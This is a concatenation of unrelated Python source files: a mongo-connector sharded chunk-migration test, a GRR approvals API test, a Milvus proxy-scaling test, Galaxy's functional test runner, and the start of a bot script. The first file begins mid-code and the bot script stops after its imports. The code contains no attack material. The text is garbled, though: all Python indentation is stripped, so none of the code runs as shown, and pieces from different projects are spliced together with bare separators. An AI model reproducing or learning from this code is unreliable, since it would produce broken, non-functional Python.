c = lambda: secondary_admin.command("replSetGetStatus")["myState"] == 2
assert_soon(c)
# Wait for the shards to come online
assert_soon(lambda: retry_until_ok(db_main.find(query).count) > 0)
query2 = {"i": {"$gte": 1000}}
assert_soon(lambda: retry_until_ok(db_main.find(query2).count) > 0)
# Only first documents should exist in MongoDB
self.assertEqual(db_main.find(query).count(), 1)
self.assertEqual(db_main.find_one(query)["i"], 0)
self.assertEqual(db_main.find(query2).count(), 1)
self.assertEqual(db_main.find_one(query2)["i"], 1000)
# Same should hold for the doc manager
assert_soon(lambda: len(self.opman1.doc_managers[0]._search()) == 2)
i_values = [d["i"] for d in self.opman1.doc_managers[0]._search()]
self.assertIn(0, i_values)
self.assertIn(1000, i_values)
def test_with_chunk_migration(self):
"""Test that DocManagers have proper state after both a successful
and an unsuccessful chunk migration
"""
# Start replicating to dummy doc managers
self.opman1.start()
self.opman2.start()
collection = self.mongos_conn["test"]["mcsharded"]
for i in range(1000):
collection.insert_one({"i": i + 500})
# Assert current state of the mongoverse
self.assertEqual(self.shard1_conn["test"]["mcsharded"].find().count(),
500)
self.assertEqual(self.shard2_conn["test"]["mcsharded"].find().count(),
500)
assert_soon(lambda: len(self.opman1.doc_managers[0]._search()) == 1000)
# Test successful chunk move from shard 1 to shard 2
self.mongos_conn["admin"].command(
"moveChunk",
"test.mcsharded",
find={"i": 1},
to="demo-set-1"
)
# doc manager should still have all docs
all_docs = self.opman1.doc_managers[0]._search()
self.assertEqual(len(all_docs), 1000)
for i, doc in enumerate(sorted(all_docs, key=lambda x: x["i"])):
self.assertEqual(doc["i"], i + 500)
# Mark the collection as "dropped". This will cause migration to fail.
self.mongos_conn["config"]["collections"].update_one(
{"_id": "test.mcsharded"},
{"$set": {"dropped": True}}
)
# Test unsuccessful chunk move from shard 2 to shard 1
def fail_to_move_chunk():
self.mongos_conn["admin"].command(
"moveChunk",
"test.mcsharded",
find={"i": 1},
to="demo-set-0"
)
self.assertRaises(pymongo.errors.OperationFailure, fail_to_move_chunk)
# doc manager should still have all docs
all_docs = self.opman1.doc_managers[0]._search()
self.assertEqual(len(all_docs), 1000)
for i, doc in enumerate(sorted(all_docs, key=lambda x: x["i"])):
self.assertEqual(doc["i"], i + 500)
def test_with_orphan_documents(self):
"""Test that DocManagers have proper state after a chunk migration
        that results in orphaned documents.
"""
# Start replicating to dummy doc managers
self.opman1.start()
self.opman2.start()
collection = self.mongos_conn["test"]["mcsharded"]
collection.insert_many([{"i": i + 500} for i in range(1000)])
# Assert current state of the mongoverse
self.assertEqual(self.shard1_conn["test"]["mcsharded"].find().count(),
500)
self.assertEqual(self.shard2_conn["test"]["mcsharded"].find().count(),
500)
assert_soon(lambda: len(self.opman1.doc_managers[0]._search()) == 1000)
# Stop replication using the 'rsSyncApplyStop' failpoint
self.shard1_conn.admin.command(
"configureFailPoint", "rsSyncApplyStop",
mode="alwaysOn"
)
# Move a chunk from shard2 to shard1
def move_chunk():
try:
self.mongos_conn["admin"].command(
"moveChunk",
"test.mcsharded",
find={"i": 1000},
to="demo-set-0"
)
except pymongo.errors.OperationFailure:
pass
# moveChunk will never complete, so use another thread to continue
mover = threading.Thread(target=move_chunk)
mover.start()
# wait for documents to start moving to shard 1
assert_soon(lambda: self.shard1_conn.test.mcsharded.count() > 500)
# Get opid for moveChunk command
operations = self.mongos_conn.test.current_op()
opid = None
for op in operations["inprog"]:
if op.get("query", {}).get("moveChunk"):
opid = op["opid"]
if opid is None:
raise SkipTest("could not find moveChunk operation, cannot test "
"failed moveChunk")
# Kill moveChunk with the opid
if self.mongos_conn.server_info()['versionArray'][:3] >= [3, 1, 2]:
self.mongos_conn.admin.command('killOp', op=opid)
else:
self.mongos_conn["test"]["$cmd.sys.killop"].find_one({"op": opid})
# Mongo Connector should not become confused by unsuccessful chunk move
docs = self.opman1.doc_managers[0]._search()
self.assertEqual(len(docs), 1000)
self.assertEqual(sorted(d["i"] for d in docs),
list(range(500, 1500)))
self.shard1_conn.admin.command(
"configureFailPoint", "rsSyncApplyStop",
mode="off"
)
# cleanup
mover.join()
def test_upgrade_oplog_progress(self):
first_oplog_ts1 = self.opman1.oplog.find_one()['ts']
first_oplog_ts2 = self.opman2.oplog.find_one()['ts']
# Old format oplog progress file:
progress = {
str(self.opman1.oplog): bson_ts_to_long(first_oplog_ts1),
str(self.opman2.oplog): bson_ts_to_long(first_oplog_ts2)
}
# Set up oplog managers to use the old format.
oplog_progress = LockingDict()
oplog_progress.dict = progress
self.opman1.oplog_progress = oplog_progress
self.opman2.oplog_progress = oplog_progress
# Cause the oplog managers to update their checkpoints.
self.opman1.checkpoint = first_oplog_ts1
self.opman2.checkpoint = first_oplog_ts2
self.opman1.update_checkpoint()
self.opman2.update_checkpoint()
# New format should be in place now.
new_format = {
self.opman1.replset_name: first_oplog_ts1,
self.opman2.replset_name: first_oplog_ts2
}
self.assertEqual(
new_format,
self.opman1.oplog_progress.get_dict()
)
self.assertEqual(
new_format,
self.opman2.oplog_progress.get_dict()
)
if __name__ == '__main__':
unittest.main()
|
approvals_test.py
|
#!/usr/bin/env python
"""Tests for API client and approvals-related API calls."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import threading
import time
from absl import app
from grr_response_core.lib.util import compatibility
from grr_response_server.gui import api_auth_manager
from grr_response_server.gui import api_call_router_with_approval_checks
from grr_response_server.gui import api_integration_test_lib
from grr.test_lib import hunt_test_lib
from grr.test_lib import test_lib
class ApiClientLibApprovalsTest(api_integration_test_lib.ApiIntegrationTest,
hunt_test_lib.StandardHuntTestMixin):
def setUp(self):
super(ApiClientLibApprovalsTest, self).setUp()
cls = api_call_router_with_approval_checks.ApiCallRouterWithApprovalChecks
cls.ClearCache()
config_overrider = test_lib.ConfigOverrider(
{"API.DefaultRouter": compatibility.GetName(cls)})
config_overrider.Start()
self.addCleanup(config_overrider.Stop)
# Force creation of new APIAuthorizationManager, so that configuration
# changes are picked up.
api_auth_manager.InitializeApiAuthManager()
def testCreateClientApproval(self):
client_id = self.SetupClient(0)
approval = self.api.Client(client_id).CreateApproval(
reason="blah", notified_users=[u"foo"])
self.assertEqual(approval.client_id, client_id)
self.assertEqual(approval.data.subject.client_id, client_id)
self.assertEqual(approval.data.reason, "blah")
self.assertFalse(approval.data.is_valid)
def testWaitUntilClientApprovalValid(self):
client_id = self.SetupClient(0)
approval = self.api.Client(client_id).CreateApproval(
reason="blah", notified_users=[u"foo"])
self.assertFalse(approval.data.is_valid)
def ProcessApproval():
time.sleep(1)
self.GrantClientApproval(
client_id,
requestor=self.token.username,
approval_id=approval.approval_id,
approver=u"foo")
thread = threading.Thread(name="ProcessApprover", target=ProcessApproval)
thread.start()
try:
result_approval = approval.WaitUntilValid()
self.assertTrue(result_approval.data.is_valid)
finally:
thread.join()
def testCreateHuntApproval(self):
h_id = self.StartHunt()
approval = self.api.Hunt(h_id).CreateApproval(
reason="blah", notified_users=[u"foo"])
self.assertEqual(approval.hunt_id, h_id)
self.assertEqual(approval.data.subject.hunt_id, h_id)
self.assertEqual(approval.data.reason, "blah")
self.assertFalse(approval.data.is_valid)
def testWaitUntilHuntApprovalValid(self):
h_id = self.StartHunt()
approval = self.api.Hunt(h_id).CreateApproval(
reason="blah", notified_users=[u"approver"])
self.assertFalse(approval.data.is_valid)
def ProcessApproval():
time.sleep(1)
self.GrantHuntApproval(
h_id,
requestor=self.token.username,
approval_id=approval.approval_id,
approver=u"approver")
ProcessApproval()
thread = threading.Thread(name="HuntApprover", target=ProcessApproval)
thread.start()
try:
result_approval = approval.WaitUntilValid()
self.assertTrue(result_approval.data.is_valid)
finally:
thread.join()
def main(argv):
test_lib.main(argv)
if __name__ == "__main__":
app.run(main)
|
test_proxy_scale.py
|
import multiprocessing
import pytest
from customize.milvus_operator import MilvusOperator
from common import common_func as cf
from common.common_type import CaseLabel
from scale import scale_common as sc, constants
from utils.util_log import test_log as log
from utils.util_k8s import wait_pods_ready, export_pod_logs
from utils.util_pymilvus import get_latest_tag
prefix = "proxy_scale"
class TestProxyScale:
def e2e_milvus_parallel(self, process_num, host, c_name):
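        # Run the e2e test against the same collection in `process_num` separate
        # processes, then wait for all of them to complete.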
process_list = []
for i in range(process_num):
p = multiprocessing.Process(target=sc.e2e_milvus, args=(host, c_name))
p.start()
process_list.append(p)
for p in process_list:
p.join()
@pytest.mark.tags(CaseLabel.L3)
def test_scale_proxy(self):
"""
target: test milvus operation after proxy expand
        method: 1. deploy milvus with 1 proxy replica
                2. run milvus e2e tests in parallel
                3. expand proxy pods from 1 to 5
                4. run milvus e2e tests
                5. shrink proxy pods from 5 to 2
        expected: data stays consistent and all operations keep working
"""
# deploy milvus cluster with one proxy
release_name = "scale-proxy"
image_tag = get_latest_tag()
image = f'{constants.IMAGE_REPOSITORY}:{image_tag}'
data_config = {
'metadata.namespace': constants.NAMESPACE,
'metadata.name': release_name,
'spec.components.image': image,
'spec.components.proxy.serviceType': 'LoadBalancer',
'spec.components.proxy.replicas': 1,
'spec.components.dataNode.replicas': 2,
'spec.config.dataCoord.enableCompaction': True,
'spec.config.dataCoord.enableGarbageCollection': True
}
mic = MilvusOperator()
mic.install(data_config)
healthy = mic.wait_for_healthy(release_name, constants.NAMESPACE, timeout=1200)
log.info(f"milvus healthy: {healthy}")
host = mic.endpoint(release_name, constants.NAMESPACE).split(':')[0]
# host = "10.98.0.7"
try:
c_name = cf.gen_unique_str(prefix)
self.e2e_milvus_parallel(5, host, c_name)
log.info('Milvus test before expand')
# expand proxy replicas from 1 to 5
mic.upgrade(release_name, {'spec.components.proxy.replicas': 5}, constants.NAMESPACE)
wait_pods_ready(constants.NAMESPACE, f"app.kubernetes.io/instance={release_name}")
self.e2e_milvus_parallel(5, host, c_name)
log.info('Milvus test after expand')
            # shrink proxy replicas from 5 to 2
mic.upgrade(release_name, {'spec.components.proxy.replicas': 2}, constants.NAMESPACE)
wait_pods_ready(constants.NAMESPACE, f"app.kubernetes.io/instance={release_name}")
self.e2e_milvus_parallel(2, host, c_name)
log.info('Milvus test after shrink')
except Exception as e:
raise Exception(str(e))
finally:
label = f"app.kubernetes.io/instance={release_name}"
log.info('Start to export milvus pod logs')
export_pod_logs(namespace=constants.NAMESPACE, label_selector=label, release_name=release_name)
mic.uninstall(release_name, namespace=constants.NAMESPACE)
|
functional_tests.py
|
#!/usr/bin/env python
import os
import re
import shutil
import sys
import tempfile
from ConfigParser import SafeConfigParser
# Assume we are run from the galaxy root directory, add lib to the python path
cwd = os.getcwd()
new_path = [ os.path.join( cwd, "lib" ), os.path.join( cwd, "test" ) ]
new_path.extend( sys.path[1:] )
sys.path = new_path
from base.test_logging import logging_config_file
from base.tool_shed_util import parse_tool_panel_config
from galaxy.util.properties import load_app_properties
import logging
import os.path
import time
import threading
import random
import httplib
import socket
import urllib
from paste import httpserver
from galaxy.app import UniverseApplication
from galaxy.web import buildapp
from galaxy import tools
from galaxy.util.json import dumps
from functional import database_contexts
from base.api_util import get_master_api_key
from base.api_util import get_user_api_key
from base.nose_util import run
from base.instrument import StructuredTestDataPlugin
import nose.core
import nose.config
import nose.loader
import nose.plugins.manager
log = logging.getLogger( "functional_tests.py" )
default_galaxy_test_host = "localhost"
default_galaxy_test_port_min = 8000
default_galaxy_test_port_max = 9999
default_galaxy_locales = 'en'
default_galaxy_test_file_dir = "test-data,https://github.com/galaxyproject/galaxy-test-data.git"
migrated_tool_panel_config = 'config/migrated_tools_conf.xml'
installed_tool_panel_configs = [
os.environ.get('GALAXY_TEST_SHED_TOOL_CONF', 'config/shed_tool_conf.xml')
]
# should this serve static resources (scripts, images, styles, etc.)
STATIC_ENABLED = True
# Set up a job_conf.xml that explicitly limits jobs to 10 minutes.
job_conf_xml = '''<?xml version="1.0"?>
<!-- A test job config that explicitly configures job running the way it is configured by default (if there is no explicit config). -->
<job_conf>
<plugins>
<plugin id="local" type="runner" load="galaxy.jobs.runners.local:LocalJobRunner" workers="4"/>
</plugins>
<handlers>
<handler id="main"/>
</handlers>
<destinations>
<destination id="local" runner="local"/>
</destinations>
<limits>
<limit type="walltime">00:10:00</limit>
</limits>
</job_conf>
'''
def get_static_settings():
"""Returns dictionary of the settings necessary for a galaxy App
to be wrapped in the static middleware.
This mainly consists of the filesystem locations of url-mapped
static resources.
"""
cwd = os.getcwd()
static_dir = os.path.join( cwd, 'static' )
# TODO: these should be copied from config/galaxy.ini
return dict(
# TODO: static_enabled needed here?
static_enabled=True,
static_cache_time=360,
static_dir=static_dir,
static_images_dir=os.path.join( static_dir, 'images', '' ),
static_favicon_dir=os.path.join( static_dir, 'favicon.ico' ),
static_scripts_dir=os.path.join( static_dir, 'scripts', '' ),
static_style_dir=os.path.join( static_dir, 'june_2007_style', 'blue' ),
static_robots_txt=os.path.join( static_dir, 'robots.txt' ),
)
def get_webapp_global_conf():
"""Get the global_conf dictionary sent as the first argument to app_factory.
"""
# (was originally sent 'dict()') - nothing here for now except static settings
global_conf = dict()
if STATIC_ENABLED:
global_conf.update( get_static_settings() )
return global_conf
def generate_config_file( input_filename, output_filename, config_items ):
'''
Generate a config file with the configuration that has been defined for the embedded web application.
This is mostly relevant when setting metadata externally, since the script for doing that does not
have access to app.config.
'''
cp = SafeConfigParser()
cp.read( input_filename )
config_items_by_section = []
for label, value in config_items:
found = False
# Attempt to determine the correct section for this configuration option.
for section in cp.sections():
if cp.has_option( section, label ):
config_tuple = section, label, value
config_items_by_section.append( config_tuple )
found = True
continue
# Default to app:main if no section was found.
if not found:
config_tuple = 'app:main', label, value
config_items_by_section.append( config_tuple )
print( config_items_by_section )
# Replace the default values with the provided configuration.
for section, label, value in config_items_by_section:
if cp.has_option( section, label ):
cp.remove_option( section, label )
cp.set( section, label, str( value ) )
fh = open( output_filename, 'w' )
cp.write( fh )
fh.close()
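# A hedged usage sketch (hypothetical file names, not part of the original script):
#
#     generate_config_file( 'config/galaxy.ini.sample', '/tmp/functional_tests_wsgi.ini',
#                           [ ( 'database_connection', 'sqlite:////tmp/universe.sqlite' ) ] )
#
# copies the sample ini and overrides each option within whatever section already
# defines it, defaulting to [app:main] otherwise.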
def run_tests( test_config ):
return run( test_config )
def __copy_database_template( source, db_path ):
"""
Copy a 'clean' sqlite template database (from file or URL) to specified
database path.
"""
os.makedirs( os.path.dirname( db_path ) )
if os.path.exists( source ):
shutil.copy( source, db_path )
assert os.path.exists( db_path )
elif source.lower().startswith( ( "http://", "https://", "ftp://" ) ):
urllib.urlretrieve( source, db_path )
else:
raise Exception( "Failed to copy database template from source %s" % source )
def main():
# ---- Configuration ------------------------------------------------------
galaxy_test_host = os.environ.get( 'GALAXY_TEST_HOST', default_galaxy_test_host )
galaxy_test_port = os.environ.get( 'GALAXY_TEST_PORT', None )
galaxy_test_save = os.environ.get( 'GALAXY_TEST_SAVE', None)
tool_path = os.environ.get( 'GALAXY_TEST_TOOL_PATH', 'tools' )
if 'HTTP_ACCEPT_LANGUAGE' not in os.environ:
os.environ[ 'HTTP_ACCEPT_LANGUAGE' ] = default_galaxy_locales
testing_migrated_tools = __check_arg( '-migrated' )
testing_installed_tools = __check_arg( '-installed' )
datatypes_conf_override = None
if testing_migrated_tools or testing_installed_tools:
# Store a jsonified dictionary of tool_id : GALAXY_TEST_FILE_DIR pairs.
galaxy_tool_shed_test_file = 'shed_tools_dict'
# We need the upload tool for functional tests, so we'll create a temporary tool panel config that defines it.
fd, tmp_tool_panel_conf = tempfile.mkstemp()
os.write( fd, '<?xml version="1.0"?>\n' )
os.write( fd, '<toolbox>\n' )
os.write( fd, '<tool file="data_source/upload.xml"/>\n' )
os.write( fd, '</toolbox>\n' )
os.close( fd )
tool_config_file = tmp_tool_panel_conf
galaxy_test_file_dir = None
library_import_dir = None
user_library_import_dir = None
# Exclude all files except test_toolbox.py.
ignore_files = ( re.compile( r'^test_[adghlmsu]*' ), re.compile( r'^test_ta*' ) )
else:
framework_tool_dir = os.path.join('test', 'functional', 'tools')
framework_test = __check_arg( '-framework' ) # Run through suite of tests testing framework.
if framework_test:
tool_conf = os.path.join( framework_tool_dir, 'samples_tool_conf.xml' )
datatypes_conf_override = os.path.join( framework_tool_dir, 'sample_datatypes_conf.xml' )
else:
# Use tool_conf.xml toolbox.
tool_conf = None
if __check_arg( '-with_framework_test_tools' ):
tool_conf = "%s,%s" % ( 'config/tool_conf.xml.sample', os.path.join( framework_tool_dir, 'samples_tool_conf.xml' ) )
test_dir = default_galaxy_test_file_dir
tool_config_file = os.environ.get( 'GALAXY_TEST_TOOL_CONF', tool_conf )
galaxy_test_file_dir = os.environ.get( 'GALAXY_TEST_FILE_DIR', test_dir )
first_test_file_dir = galaxy_test_file_dir.split(",")[0]
if not os.path.isabs( first_test_file_dir ):
first_test_file_dir = os.path.join( os.getcwd(), first_test_file_dir )
library_import_dir = first_test_file_dir
import_dir = os.path.join( first_test_file_dir, 'users' )
if os.path.exists(import_dir):
user_library_import_dir = import_dir
else:
user_library_import_dir = None
ignore_files = ()
start_server = 'GALAXY_TEST_EXTERNAL' not in os.environ
tool_data_table_config_path = None
if os.path.exists( 'tool_data_table_conf.test.xml' ):
# If explicitly defined tables for test, use those.
tool_data_table_config_path = 'tool_data_table_conf.test.xml'
else:
        # ... otherwise find whatever Galaxy would use as the default and add
        # the sample data for functional tests to that.
default_tool_data_config = 'config/tool_data_table_conf.xml.sample'
for tool_data_config in ['config/tool_data_table_conf.xml', 'tool_data_table_conf.xml' ]:
if os.path.exists( tool_data_config ):
default_tool_data_config = tool_data_config
tool_data_table_config_path = '%s,test/functional/tool-data/sample_tool_data_tables.xml' % default_tool_data_config
default_data_manager_config = 'config/data_manager_conf.xml.sample'
for data_manager_config in ['config/data_manager_conf.xml', 'data_manager_conf.xml' ]:
if os.path.exists( data_manager_config ):
default_data_manager_config = data_manager_config
data_manager_config_file = "%s,test/functional/tools/sample_data_manager_conf.xml" % default_data_manager_config
shed_tool_data_table_config = 'config/shed_tool_data_table_conf.xml'
tool_dependency_dir = os.environ.get( 'GALAXY_TOOL_DEPENDENCY_DIR', None )
use_distributed_object_store = os.environ.get( 'GALAXY_USE_DISTRIBUTED_OBJECT_STORE', False )
galaxy_test_tmp_dir = os.environ.get( 'GALAXY_TEST_TMP_DIR', None )
if galaxy_test_tmp_dir is None:
galaxy_test_tmp_dir = tempfile.mkdtemp()
galaxy_job_conf_file = os.environ.get( 'GALAXY_TEST_JOB_CONF',
os.path.join( galaxy_test_tmp_dir, 'test_job_conf.xml' ) )
# Generate the job_conf.xml file.
file( galaxy_job_conf_file, 'w' ).write( job_conf_xml )
database_auto_migrate = False
galaxy_test_proxy_port = None
if start_server:
tempdir = tempfile.mkdtemp( dir=galaxy_test_tmp_dir )
# Configure the database path.
if 'GALAXY_TEST_DBPATH' in os.environ:
galaxy_db_path = os.environ[ 'GALAXY_TEST_DBPATH' ]
else:
galaxy_db_path = os.path.join( tempdir, 'database' )
# Configure the paths Galaxy needs to test tools.
file_path = os.path.join( galaxy_db_path, 'files' )
template_cache_path = os.path.join( galaxy_db_path, 'compiled_templates' )
new_file_path = tempfile.mkdtemp( prefix='new_files_path_', dir=tempdir )
job_working_directory = tempfile.mkdtemp( prefix='job_working_directory_', dir=tempdir )
install_database_connection = os.environ.get( 'GALAXY_TEST_INSTALL_DBURI', None )
if 'GALAXY_TEST_DBURI' in os.environ:
database_connection = os.environ['GALAXY_TEST_DBURI']
else:
db_path = os.path.join( galaxy_db_path, 'universe.sqlite' )
if 'GALAXY_TEST_DB_TEMPLATE' in os.environ:
# Middle ground between recreating a completely new
# database and pointing at existing database with
# GALAXY_TEST_DBURI. The former requires a lot of setup
# time, the latter results in test failures in certain
# cases (namely tool shed tests expecting clean database).
log.debug( "Copying database template from %s.", os.environ['GALAXY_TEST_DB_TEMPLATE'] )
__copy_database_template(os.environ['GALAXY_TEST_DB_TEMPLATE'], db_path)
database_auto_migrate = True
database_connection = 'sqlite:///%s' % db_path
kwargs = {}
for dir in file_path, new_file_path, template_cache_path:
try:
if not os.path.exists( dir ):
os.makedirs( dir )
except OSError:
pass
# Data Manager testing temp path
# For storing Data Manager outputs and .loc files so that real ones don't get clobbered
data_manager_test_tmp_path = tempfile.mkdtemp( prefix='data_manager_test_tmp', dir=galaxy_test_tmp_dir )
galaxy_data_manager_data_path = tempfile.mkdtemp( prefix='data_manager_tool-data', dir=data_manager_test_tmp_path )
# ---- Build Application --------------------------------------------------
master_api_key = get_master_api_key()
app = None
if start_server:
kwargs = dict( admin_users='test@bx.psu.edu',
api_allow_run_as='test@bx.psu.edu',
allow_library_path_paste=True,
allow_user_creation=True,
allow_user_deletion=True,
database_connection=database_connection,
database_auto_migrate=database_auto_migrate,
datatype_converters_config_file="datatype_converters_conf.xml.sample",
file_path=file_path,
id_secret='changethisinproductiontoo',
job_queue_workers=5,
job_working_directory=job_working_directory,
library_import_dir=library_import_dir,
log_destination="stdout",
new_file_path=new_file_path,
template_cache_path=template_cache_path,
running_functional_tests=True,
shed_tool_data_table_config=shed_tool_data_table_config,
template_path="templates",
test_conf="test.conf",
tool_config_file=tool_config_file,
tool_data_table_config_path=tool_data_table_config_path,
tool_path=tool_path,
galaxy_data_manager_data_path=galaxy_data_manager_data_path,
tool_parse_help=False,
update_integrated_tool_panel=False,
use_heartbeat=False,
user_library_import_dir=user_library_import_dir,
master_api_key=master_api_key,
use_tasked_jobs=True,
check_migrate_tools=False,
cleanup_job='onsuccess',
enable_beta_tool_formats=True,
auto_configure_logging=logging_config_file is None,
data_manager_config_file=data_manager_config_file )
if install_database_connection is not None:
kwargs[ 'install_database_connection' ] = install_database_connection
if not database_connection.startswith( 'sqlite://' ):
kwargs[ 'database_engine_option_max_overflow' ] = '20'
kwargs[ 'database_engine_option_pool_size' ] = '10'
if tool_dependency_dir is not None:
kwargs[ 'tool_dependency_dir' ] = tool_dependency_dir
if use_distributed_object_store:
kwargs[ 'object_store' ] = 'distributed'
kwargs[ 'distributed_object_store_config_file' ] = 'distributed_object_store_conf.xml.sample'
if datatypes_conf_override:
kwargs[ 'datatypes_config_file' ] = datatypes_conf_override
# If the user has passed in a path for the .ini file, do not overwrite it.
galaxy_config_file = os.environ.get( 'GALAXY_TEST_INI_FILE', None )
if not galaxy_config_file:
galaxy_config_file = os.path.join( galaxy_test_tmp_dir, 'functional_tests_wsgi.ini' )
config_items = []
for label in kwargs:
config_tuple = label, kwargs[ label ]
config_items.append( config_tuple )
# Write a temporary file, based on config/galaxy.ini.sample, using the configuration options defined above.
generate_config_file( 'config/galaxy.ini.sample', galaxy_config_file, config_items )
# Set the global_conf[ '__file__' ] option to the location of the temporary .ini file, which gets passed to set_metadata.sh.
kwargs[ 'global_conf' ] = get_webapp_global_conf()
kwargs[ 'global_conf' ][ '__file__' ] = galaxy_config_file
kwargs[ 'config_file' ] = galaxy_config_file
kwargs = load_app_properties(
kwds=kwargs
)
# Build the Universe Application
app = UniverseApplication( **kwargs )
database_contexts.galaxy_context = app.model.context
log.info( "Embedded Universe application started" )
# ---- Run webserver ------------------------------------------------------
server = None
if start_server:
webapp = buildapp.app_factory( kwargs[ 'global_conf' ], app=app,
use_translogger=False, static_enabled=STATIC_ENABLED )
if galaxy_test_port is not None:
server = httpserver.serve( webapp, host=galaxy_test_host, port=galaxy_test_port, start_loop=False )
else:
random.seed()
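            # Try up to nine randomly chosen ports in the configured range; ports that are already in use (errno 98, EADDRINUSE) are skipped.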
for i in range( 0, 9 ):
try:
galaxy_test_port = str( random.randint( default_galaxy_test_port_min, default_galaxy_test_port_max ) )
log.debug( "Attempting to serve app on randomly chosen port: %s" % galaxy_test_port )
server = httpserver.serve( webapp, host=galaxy_test_host, port=galaxy_test_port, start_loop=False )
break
                except socket.error as e:
                    if e.errno == 98:
                        continue
                    raise
else:
raise Exception( "Unable to open a port between %s and %s to start Galaxy server" % ( default_galaxy_test_port_min, default_galaxy_test_port_max ) )
if galaxy_test_proxy_port:
os.environ['GALAXY_TEST_PORT'] = galaxy_test_proxy_port
else:
os.environ['GALAXY_TEST_PORT'] = galaxy_test_port
t = threading.Thread( target=server.serve_forever )
t.start()
# Test if the server is up
for i in range( 10 ):
conn = httplib.HTTPConnection( galaxy_test_host, galaxy_test_port ) # directly test the app, not the proxy
conn.request( "GET", "/" )
if conn.getresponse().status == 200:
break
time.sleep( 0.1 )
else:
raise Exception( "Test HTTP server did not return '200 OK' after 10 tries" )
log.info( "Embedded web server started" )
# ---- Find tests ---------------------------------------------------------
if galaxy_test_proxy_port:
log.info( "Functional tests will be run against %s:%s" % ( galaxy_test_host, galaxy_test_proxy_port ) )
else:
log.info( "Functional tests will be run against %s:%s" % ( galaxy_test_host, galaxy_test_port ) )
success = False
try:
tool_configs = app.config.tool_configs
        # Handy for functional tests that want to save their outputs.
if galaxy_test_save:
os.environ[ 'GALAXY_TEST_SAVE' ] = galaxy_test_save
        # Passed in through the script's environment; leaves a copy of all test validation files.
os.environ[ 'GALAXY_TEST_HOST' ] = galaxy_test_host
def _run_functional_test( testing_shed_tools=None ):
workflow_test = __check_arg( '-workflow', param=True )
if workflow_test:
import functional.workflow
functional.workflow.WorkflowTestCase.workflow_test_file = workflow_test
functional.workflow.WorkflowTestCase.master_api_key = master_api_key
functional.workflow.WorkflowTestCase.user_api_key = get_user_api_key()
data_manager_test = __check_arg( '-data_managers', param=False )
if data_manager_test:
import functional.test_data_managers
functional.test_data_managers.data_managers = app.data_managers # seems like a hack...
functional.test_data_managers.build_tests(
tmp_dir=data_manager_test_tmp_path,
testing_shed_tools=testing_shed_tools,
master_api_key=master_api_key,
user_api_key=get_user_api_key(),
)
else:
                # We must make sure that functional.test_toolbox is always imported after
                # database_contexts.galaxy_context is set (which occurs in this method above).
                # If functional.test_toolbox is imported before database_contexts.galaxy_context
                # is set, sa_session will be None in all methods that use it.
import functional.test_toolbox
functional.test_toolbox.toolbox = app.toolbox
# When testing data managers, do not test toolbox.
functional.test_toolbox.build_tests(
app=app,
testing_shed_tools=testing_shed_tools,
master_api_key=master_api_key,
user_api_key=get_user_api_key(),
)
test_config = nose.config.Config( env=os.environ, ignoreFiles=ignore_files, plugins=nose.plugins.manager.DefaultPluginManager() )
test_config.plugins.addPlugin( StructuredTestDataPlugin() )
test_config.configure( sys.argv )
result = run_tests( test_config )
success = result.wasSuccessful()
return success
if testing_migrated_tools or testing_installed_tools:
shed_tools_dict = {}
if testing_migrated_tools:
has_test_data, shed_tools_dict = parse_tool_panel_config( migrated_tool_panel_config, shed_tools_dict )
elif testing_installed_tools:
for shed_tool_config in installed_tool_panel_configs:
has_test_data, shed_tools_dict = parse_tool_panel_config( shed_tool_config, shed_tools_dict )
# Persist the shed_tools_dict to the galaxy_tool_shed_test_file.
shed_tools_file = open( galaxy_tool_shed_test_file, 'w' )
shed_tools_file.write( dumps( shed_tools_dict ) )
shed_tools_file.close()
if not os.path.isabs( galaxy_tool_shed_test_file ):
galaxy_tool_shed_test_file = os.path.join( os.getcwd(), galaxy_tool_shed_test_file )
os.environ[ 'GALAXY_TOOL_SHED_TEST_FILE' ] = galaxy_tool_shed_test_file
if testing_installed_tools:
# Eliminate the migrated_tool_panel_config from the app's tool_configs, append the list of installed_tool_panel_configs,
# and reload the app's toolbox.
relative_migrated_tool_panel_config = os.path.join( app.config.root, migrated_tool_panel_config )
if relative_migrated_tool_panel_config in tool_configs:
tool_configs.remove( relative_migrated_tool_panel_config )
for installed_tool_panel_config in installed_tool_panel_configs:
tool_configs.append( installed_tool_panel_config )
app.toolbox = tools.ToolBox( tool_configs, app.config.tool_path, app )
success = _run_functional_test( testing_shed_tools=True )
try:
os.unlink( tmp_tool_panel_conf )
except:
log.info( "Unable to remove temporary file: %s" % tmp_tool_panel_conf )
try:
os.unlink( galaxy_tool_shed_test_file )
except:
log.info( "Unable to remove file: %s" % galaxy_tool_shed_test_file )
else:
if galaxy_test_file_dir:
os.environ[ 'GALAXY_TEST_FILE_DIR' ] = galaxy_test_file_dir
success = _run_functional_test( )
except:
log.exception( "Failure running tests" )
log.info( "Shutting down" )
# ---- Tear down -----------------------------------------------------------
if server:
log.info( "Shutting down embedded web server" )
server.server_close()
server = None
log.info( "Embedded web server stopped" )
if app:
log.info( "Shutting down app" )
app.shutdown()
app = None
log.info( "Embedded Universe application stopped" )
try:
if os.path.exists( tempdir ) and 'GALAXY_TEST_NO_CLEANUP' not in os.environ:
log.info( "Cleaning up temporary files in %s" % tempdir )
shutil.rmtree( tempdir )
else:
log.info( "GALAXY_TEST_NO_CLEANUP is on. Temporary files in %s" % tempdir )
except:
pass
if success:
return 0
else:
return 1
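# __check_arg removes `name` from sys.argv so nose's own argument parsing never sees it; with
# param=True it also consumes and returns the value immediately following the flag, otherwise
# it simply reports whether the flag was present.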
def __check_arg( name, param=False ):
try:
index = sys.argv.index( name )
del sys.argv[ index ]
if param:
ret_val = sys.argv[ index ]
del sys.argv[ index ]
else:
ret_val = True
except ValueError:
ret_val = False
return ret_val
if __name__ == "__main__":
sys.exit( main() )
bot.py
import asyncio
import base64
import concurrent.futures
import datetime
import glob
import json
import math
import os
import pathlib
import random
import sys
import time
from json import dumps, loads
from random import randint
import re
from re import findall
import requests
import urllib3
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
from requests import post
from googletrans import Translator
import io
from PIL import Image , ImageFont, ImageDraw
import arabic_reshaper
from bidi.algorithm import get_display
from mutagen.mp3 import MP3
from gtts import gTTS
from threading import Thread
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
from difflib import SequenceMatcher
def similar(a, b):
return SequenceMatcher(None, a, b).ratio()
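# similar() returns difflib's similarity ratio in [0, 1]; e.g. similar("salam", "salaam") ~= 0.91.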
# License: these classes are by Bahman Ahmadi and are open source and free to use.
